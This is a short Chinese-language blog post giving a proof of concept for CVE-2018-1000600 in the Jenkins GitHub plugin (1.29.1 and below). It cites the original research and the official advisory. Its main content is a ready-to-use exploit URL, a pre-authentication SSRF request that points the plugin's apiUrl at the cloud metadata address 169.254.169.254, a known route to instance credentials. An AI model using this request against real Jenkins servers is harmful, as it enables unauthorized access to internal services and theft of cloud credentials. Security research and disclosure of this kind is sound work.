Jenkins - CVE-2018-1000600 PoC
来源博客文章
https://blog.orange.tw/2019/01/hacking-jenkins-part-1-play-with-dynamic-routing.html
漏洞链利用
通过与CVE-2018-1000600链式结合,实现预认证完全响应SSRF攻击。
官方安全公告:https://jenkins.io/security/advisory/2018-06-25/#SECURITY-915
影响范围
该漏洞影响默认安装的GitHub插件,具体版本为GitHub Plugin 1.29.1及以下。
PoC代码
http://jenkins.local/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword
?apiUrl=http://169.254.169.254/%23
&login=orange
&password=tsai
标签
devops, jenkins, Pentesting
发布时间
2019年3月5日下午2:01
作者
CG
更多精彩内容 请关注我的个人公众号 公众号(办公AI智能小助手)
公众号二维码
